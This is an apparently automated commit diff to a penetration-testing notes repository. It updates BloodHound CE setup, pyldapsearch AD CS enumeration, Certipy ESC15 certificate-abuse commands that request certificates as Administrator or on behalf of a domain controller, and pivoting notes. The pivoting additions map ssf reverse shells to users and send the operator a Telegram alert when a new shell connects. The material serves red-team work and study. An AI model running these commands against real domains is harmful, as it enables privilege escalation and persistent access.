[AHK] Automatic update 👽

admin/linux/kali.md

@@ -78,6 +78,7 @@ Mix settings list (both for hardware install and virtualization):
 
 ```
 $ script ~/ws/shells/`date "+%FT%H%M%S"`.script
+$ for i in `grep -anr '\... OK' | rev | cut -d: -f2 | rev | awk -F" " '{print $3}' | sort -u | grep . | cut -d: -f1`; do proxychains4 -q dig +tcp +noall +answer $i @192.168.1.11 | grep IN; sleep $((1+RANDOM % 3)); done
 ```
 
 

pentest/infrastructure/ad/README.md

@@ -158,35 +158,35 @@ sed -i 's/"password": "exegol4thewin"/"password": "WeaponizeK4li!"/g' ~/.config/
 Quick start:
 
 ```bash
-$ curl -sSL https://ghst.ly/getbhce -o docker-compose.yml
-$ sed -i 's|is the variable available outside of Docker|is the variable available outside of Docker\n      - bhe_default_admin_principal_name=${bhe_default_admin_principal_name}\n      - bhe_default_admin_password=${bhe_default_admin_password}\n      - bhe_default_admin_email_address=${bhe_default_admin_email_address}|g' docker-compose.yml
-$ curl -sSL https://github.com/SpecterOps/BloodHound/raw/refs/heads/main/examples/docker-compose/.env.example -o .env
-$ sed -i 's|#NEO4J_DATA_MOUNT=./neo4j/data|NEO4J_DATA_MOUNT=./neo4j/data|g' .env
-$ sed -i 's|#bhe_default_admin_principal_name=|bhe_default_admin_principal_name=admin|g' .env
-$ sed -i 's|#bhe_default_admin_password=|bhe_default_admin_password=1|g' .env
-$ sed -i 's|#bhe_default_admin_email_address=|[email protected]|g' .env
-$ docker compose pull && docker compose up
+curl -sSL https://ghst.ly/getbhce -o docker-compose.yml
+sed -i 's|is the variable available outside of Docker|is the variable available outside of Docker\n      - bhe_default_admin_principal_name=${bhe_default_admin_principal_name}\n      - bhe_default_admin_password=${bhe_default_admin_password}\n      - bhe_default_admin_email_address=${bhe_default_admin_email_address}|g' docker-compose.yml
+curl -sSL https://github.com/SpecterOps/BloodHound/raw/refs/heads/main/examples/docker-compose/.env.example -o .env
+sed -i 's|#NEO4J_DATA_MOUNT=./neo4j/data|NEO4J_DATA_MOUNT=./neo4j/data|g' .env
+sed -i 's|#bhe_default_admin_principal_name=|bhe_default_admin_principal_name=admin|g' .env
+sed -i 's|#bhe_default_admin_password=|bhe_default_admin_password=1|g' .env
+sed -i 's|#bhe_default_admin_email_address=|[email protected]|g' .env
+docker compose pull && docker compose up
 ```
 
 Import custom queries from legacy BloodHound:
 
 ```bash
-$ pipx install -f "git+https://github.com/exploide/bloodhound-cli.git"
-$ bhcli auth 127.0.0.1:8080 -u admin -p 'WeaponizeK4li!'
-$ bhcli queries ~/.config/bloodhound/customqueries.json
+pipx install -f "git+https://github.com/exploide/bloodhound-cli.git"
+bhcli auth 127.0.0.1:8080 -u admin -p 'WeaponizeK4li!'
+bhcli queries ~/.config/bloodhound/customqueries.json
 ```
 
 BloodHound.py collector:
 
 ```bash
-$ pipx install -f "git+https://github.com/dirkjanm/BloodHound.py.git@bloodhound-ce"
+pipx install -f "git+https://github.com/dirkjanm/BloodHound.py.git@bloodhound-ce"
 ```
 
 Reset ALL:
 
 ```bash
-$ docker compose down
-$ docker volume rm `docker volume ls -q | grep -e neo4j-data -e postgres-data`
+docker compose down
+docker volume rm `docker volume ls -q | grep -e neo4j-data -e postgres-data`
 ```
 {% endtab %}
 {% endtabs %}
@@ -251,14 +251,14 @@ $ bloodhound-import -du neo4j -dp 'Passw0rd!' 20190115133114*.json
 
 Install:
 
-```bash
+```
 $ pipx install -f "git+https://github.com/coffeegist/bofhound.git"
 $ pipx install -f "git+https://github.com/Tw1sm/pyldapsearch.git"
 ```
 
 An example of manual AD CS data collecting:
 
-```bash
+```
 $ pyldapsearch -k -no-pass megacorp.local/[email protected] -no-smb -dc-ip DC01.megacorp.local -ldaps -base-dn "DC=megacorp,DC=local" '(objectclass=domain)' -attributes '*,ntsecuritydescriptor' -silent
 $ pyldapsearch -k -no-pass megacorp.local/[email protected] -no-smb -dc-ip DC01.megacorp.local -ldaps -base-dn "CN=Configuration,DC=megacorp,DC=local" '(objectclass=pKIEnrollmentService)' -attributes '*,ntsecuritydescriptor' -silent
 $ pyldapsearch -k -no-pass megacorp.local/[email protected] -no-smb -dc-ip DC01.megacorp.local -ldaps -base-dn "CN=Configuration,DC=megacorp,DC=local" '(objectclass=certificationAuthority)' -attributes '*,ntsecuritydescriptor' -silent
@@ -268,19 +268,19 @@ $ pyldapsearch -k -no-pass megacorp.local/[email protected] -no-smb
 
 Resolve a SID:
 
-```bash
+```
 $ pyldapsearch -k -no-pass megacorp.local/[email protected] -no-smb -dc-ip DC01.megacorp.local -ldaps '(objectSid=S-1-5-21-2513662962-556311701-4231341873-512)' -attributes '*,ntsecuritydescriptor'
 ```
 
 Resolve group memebership:
 
-```bash
+```
 $ pyldapsearch -k -no-pass megacorp.local/[email protected] -no-smb -dc-ip DC01.megacorp.local -ldaps '(memberOf:1.2.840.113556.1.4.1941:=CN=Domain Admins,CN=Users,DC=megacorp,DC=local)' -attributes '*,ntsecuritydescriptor'
 ```
 
 Parse:
 
-```bash
+```
 $ bofhound -i ~/.pyldapsearch/logs --parser ldapsearch --zip
 ```
 

pentest/infrastructure/ad/ad-cs-abuse/esc15.md

@@ -34,7 +34,7 @@ PS > Get-ADObject -Filter 'objectClass -eq "pKICertificateTemplate"' -SearchBase
 
 Abusing **Client Authentication**:
 
-```bash
+```
 $ proxychains4 certipy req -u [email protected] -p 'Passw0rd!' -ca CorpCA -target CA01.megacorp.local -target-ip 192.168.1.12 -template VulnTemplate --application-policies '1.3.6.1.5.5.7.3.2' -upn '[email protected]' -sid <DC01_SID> -ns 192.168.1.11 -dc-ip 192.168.1.11 -dns-tcp
 ```
 
@@ -44,7 +44,7 @@ $ proxychains4 certipy req -u [email protected] -p 'Passw0rd!' -ca CorpC
 
 Abusing **Certificate Request Agent**:
 
-```bash
+```
 $ proxychains4 certipy req -u [email protected] -p 'Passw0rd!' -ca CorpCA -target CA01.megacorp.local -target-ip 192.168.1.12 -template VulnTemplate --application-policies '1.3.6.1.4.1.311.20.2.1' -ns 192.168.1.11 -dc-ip 192.168.1.11 -dns-tcp
 $ proxychains4 certipy req -u [email protected] -p 'Passw0rd!' -pfx snovvcrash.pfx -ca CorpCA -target CA01.megacorp.local -target-ip 192.168.1.12 -template User -on-behalf-of 'MEGACORP\DC01$' -ns 192.168.1.11 -dc-ip 192.168.1.11 -dns-tcp
 ```

pentest/infrastructure/pivoting.md

@@ -301,7 +301,6 @@ $ python rdp2tcp.py add reverse 127.0.0.1 1080 127.0.0.1 9003
 
 ## Tools
 
-- [https://github.com/securesocketfunneling/ssf](https://github.com/securesocketfunneling/ssf)
 - [https://github.com/ginuerzh/gost](https://github.com/ginuerzh/gost)
 - [https://github.com/sysdream/ligolo](https://github.com/sysdream/ligolo)
 - [https://github.com/nicocha30/ligolo-ng](https://github.com/nicocha30/ligolo-ng)
@@ -477,6 +476,31 @@ $ python neoreg.py -k 'Passw0rd!' -u http://web01.megacorp.local/tunnel.aspx -l
 ```
 
 
+### ssf
+
+- [https://github.com/securesocketfunneling/ssf](https://github.com/securesocketfunneling/ssf)
+
+Map shells to users:
+
+```bash
+for port in `netstat -tulpan | grep 127.0.0.1 | grep ssfd | awk '{print $4}' | awk -F: '{print $2}'`; do echo "127.0.0.1:$port"; (echo qwinsta | nc 127.0.0.1 $port & sleep 1 && kill -s INT $!) 2>/dev/null | grep -a console; done
+```
+
+Alert to Tg about a new connection:
+
+{% code title="check_ssfd_sockets.sh" %}
+```bash
+#!/bin/bash
+# * * * * * /home/user/tools/check_ssfd_sockets.sh
+
+if [ "$(sudo netstat -tulpan | grep LIST | grep ssfd | wc -l)" -gt 1 ]; then
+    MESSAGE="new ssfd connection arrived"
+    curl -s -X POST "https://api.telegram.org/bot$TOKEN/sendMessage" -d chat_id="$CHAT_ID" -d text="$MESSAGE" >/dev/null
+fi
+```
+{% endcode %}
+
+
 
 
 ## Services